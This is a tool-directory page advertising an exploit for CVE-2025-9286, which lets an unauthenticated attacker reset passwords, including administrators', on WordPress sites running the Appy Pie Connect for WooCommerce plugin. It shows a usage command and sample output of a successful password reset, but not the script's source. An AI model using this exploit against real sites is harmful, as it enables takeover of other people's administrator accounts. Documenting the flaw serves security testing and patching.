Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-9286 — Appy Pie Connect for WooCommerce <= 1.1.2 - Missing Authorization to Unauthenticated Privilege Escalation | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-9286
Privilege EscalationPassword AttacksExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2025-9286

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - Missing Authorization to Unauthenticated Privilege Escalation

View Repository
311 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-9286

Appy Pie Connect for WooCommerce <= 1.1.2 - Missing Authorization to Unauthenticated Privilege Escalation

⚠️ Appy Pie Connect for WooCommerce <= 1.1.2 - Missing Authorization to Unauthenticated Privilege Escalation via reset_user_password

📝 Description

The Appy Pie Connect for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within the reset_user_password() REST handler in all versions up to, and including, 1.1.2.
This makes it possible for unauthenticated attackers to reset the password of arbitrary users, including administrators, thereby gaining administrative access.

  • CVE: CVE-2025-9286
  • CVSS: 9.8 (Critical)

💻 Exploit Script

The following exploit can be used to leverage CVE-2025-9286 against WordPress sites running the vulnerable plugin version.

Script Name: CVE-2025-9286.py

⚙️ Usage

root@kitploit:~
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1

🟢 Sample Output (Successful Exploitation)

root@kitploit:~
[+] Checking plugin version: http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] Vulnerable plugin detected (1.1.2). Attempting exploitation...
[*] Please wait, attempting to change password...
[+] Exploit successful! Password has been reset.
[*] New password: Nxploited
[+] Vulnerability exploited and password changed successfully.

📬 Contact & Community

  • 📨 Telegram: @Kxploit
  • 📡 Telegram Channel: @KNxploited

⚠️ Disclaimer

This exploit is for educational and authorized penetration testing purposes only.
Unauthorized use against systems without explicit permission is illegal.
The author is not responsible for any misuse or damage caused by this tool.


By: Khaled Alenazi (Nxploited)

Download Tool